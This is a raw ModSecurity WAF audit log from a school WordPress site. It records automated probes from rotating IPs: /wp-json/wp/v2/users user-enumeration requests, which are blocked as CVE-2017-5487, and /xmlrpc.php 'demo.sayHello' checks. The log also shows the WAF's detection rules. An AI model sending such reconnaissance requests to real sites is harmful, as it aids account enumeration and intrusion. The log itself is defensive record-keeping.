1747423889966869 6846; combined=4790, p1=632, p2=3907, p3=37, p4=42, p5=104, sr=109, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95f7fa31-Z-- --d18e6211-A-- [17/May/2025:02:32:08 +0700] aCeSuNhEtho3ciA0wehdlQAAAJA 103.236.140.4 53944 103.236.140.4 8181 --d18e6211-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d18e6211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d18e6211-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423928467021 3352 (- - -) Stopwatch2: 1747423928467021 3352; combined=1470, p1=509, p2=928, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d18e6211-Z-- --90211e3a-A-- [17/May/2025:02:32:13 +0700] aCeSvdhEtho3ciA0wehdlgAAAJE 103.236.140.4 53948 103.236.140.4 8181 --90211e3a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90211e3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90211e3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423933349491 2809 (- - -) Stopwatch2: 1747423933349491 2809; combined=1259, p1=402, p2=827, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90211e3a-Z-- --a5439a39-A-- [17/May/2025:02:32:14 +0700] aCeSvthEtho3ciA0wehdlwAAAIg 103.236.140.4 53950 103.236.140.4 8181 --a5439a39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5439a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5439a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423934121154 3162 (- - -) Stopwatch2: 1747423934121154 3162; combined=1392, p1=462, p2=899, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5439a39-Z-- --0b48a729-A-- [17/May/2025:02:32:14 +0700] aCeSvkE0LfP59mkCzg416AAAAMY 103.236.140.4 53952 103.236.140.4 8181 --0b48a729-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b48a729-C-- demo.sayHello --0b48a729-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b48a729-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423934881052 5860 (- - -) Stopwatch2: 1747423934881052 5860; combined=4491, p1=477, p2=3743, p3=44, p4=42, p5=106, sr=92, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b48a729-Z-- --9331306a-A-- [17/May/2025:02:32:20 +0700] aCeSxNhEtho3ciA0wehdmQAAAJM 103.236.140.4 53958 103.236.140.4 8181 --9331306a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.78 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9331306a-C-- demo.sayHello --9331306a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9331306a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423940331908 5093 (- - -) Stopwatch2: 1747423940331908 5093; combined=3948, p1=466, p2=3273, p3=22, p4=25, p5=94, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9331306a-Z-- --2686d623-A-- [17/May/2025:02:32:20 +0700] aCeSxNe6THFz1hsaJaLZFAAAAAQ 103.236.140.4 53962 103.236.140.4 8181 --2686d623-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2686d623-C-- demo.sayHello --2686d623-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2686d623-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423940861678 5333 (- - -) Stopwatch2: 1747423940861678 5333; combined=4045, p1=523, p2=3310, p3=29, p4=31, p5=90, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2686d623-Z-- --e434aa12-A-- [17/May/2025:02:32:52 +0700] aCeS5NhEtho3ciA0wehdnQAAAJQ 103.236.140.4 53968 103.236.140.4 8181 --e434aa12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e434aa12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e434aa12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423972438021 3070 (- - -) Stopwatch2: 1747423972438021 3070; combined=1358, p1=465, p2=858, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e434aa12-Z-- --8c7e7e0d-A-- [17/May/2025:02:32:58 +0700] aCeS6thEtho3ciA0wehdnwAAAJI 103.236.140.4 53972 103.236.140.4 8181 --8c7e7e0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.105 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c7e7e0d-C-- demo.sayHello --8c7e7e0d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c7e7e0d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423978157273 4703 (- - -) Stopwatch2: 1747423978157273 4703; combined=3681, p1=426, p2=3050, p3=22, p4=25, p5=92, sr=67, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c7e7e0d-Z-- --fd04570c-A-- [17/May/2025:02:33:09 +0700] aCeS9UE0LfP59mkCzg416gAAAMs 103.236.140.4 53976 103.236.140.4 8181 --fd04570c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd04570c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd04570c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423989783005 3083 (- - -) Stopwatch2: 1747423989783005 3083; combined=1360, p1=459, p2=866, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd04570c-Z-- --43695e02-A-- [17/May/2025:02:33:16 +0700] aCeS_NhEtho3ciA0wehdogAAAII 103.236.140.4 53980 103.236.140.4 8181 --43695e02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43695e02-C-- demo.sayHello --43695e02-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43695e02-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423996200000 5571 (- - -) Stopwatch2: 1747423996200000 5571; combined=4047, p1=543, p2=3290, p3=29, p4=31, p5=91, sr=97, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43695e02-Z-- --1fad7324-A-- [17/May/2025:02:33:27 +0700] aCeTB9e6THFz1hsaJaLZFQAAAA0 103.236.140.4 53984 103.236.140.4 8181 --1fad7324-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1fad7324-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fad7324-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424007883047 2337 (- - -) Stopwatch2: 1747424007883047 2337; combined=1109, p1=388, p2=693, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fad7324-Z-- --7dc18834-A-- [17/May/2025:02:33:32 +0700] aCeTDNhEtho3ciA0wehdpQAAAIc 103.236.140.4 53988 103.236.140.4 8181 --7dc18834-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7dc18834-C-- demo.sayHello --7dc18834-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dc18834-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424012648477 4612 (- - -) Stopwatch2: 1747424012648477 4612; combined=3574, p1=435, p2=2940, p3=23, p4=24, p5=89, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dc18834-Z-- --84949168-A-- [17/May/2025:02:34:11 +0700] aCeTM9hEtho3ciA0wehdpwAAAJA 103.236.140.4 53992 103.236.140.4 8181 --84949168-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --84949168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84949168-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424051382594 3296 (- - -) Stopwatch2: 1747424051382594 3296; combined=1403, p1=481, p2=881, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84949168-Z-- --e6d27a7b-A-- [17/May/2025:02:34:17 +0700] aCeTOEE0LfP59mkCzg416wAAANM 103.236.140.4 53996 103.236.140.4 8181 --e6d27a7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e6d27a7b-C-- demo.sayHello --e6d27a7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6d27a7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424056995599 5385 (- - -) Stopwatch2: 1747424056995599 5385; combined=4080, p1=497, p2=3370, p3=28, p4=32, p5=90, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6d27a7b-Z-- --927ce728-A-- [17/May/2025:02:34:39 +0700] aCeTT9hEtho3ciA0wehdqQAAAIg 103.236.140.4 54000 103.236.140.4 8181 --927ce728-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --927ce728-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --927ce728-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424079478947 3346 (- - -) Stopwatch2: 1747424079478947 3346; combined=1480, p1=515, p2=933, p3=0, p4=0, p5=32, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --927ce728-Z-- --a496ff13-A-- [17/May/2025:02:34:41 +0700] aCeTUUE0LfP59mkCzg417AAAANA 103.236.140.4 54004 103.236.140.4 8181 --a496ff13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a496ff13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a496ff13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424081778590 2142 (- - -) Stopwatch2: 1747424081778590 2142; combined=1051, p1=347, p2=677, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a496ff13-Z-- --2cffa82a-A-- [17/May/2025:02:34:43 +0700] aCeTU9hEtho3ciA0wehdqwAAAJM 103.236.140.4 54006 103.236.140.4 8181 --2cffa82a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2cffa82a-C-- demo.sayHello --2cffa82a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2cffa82a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 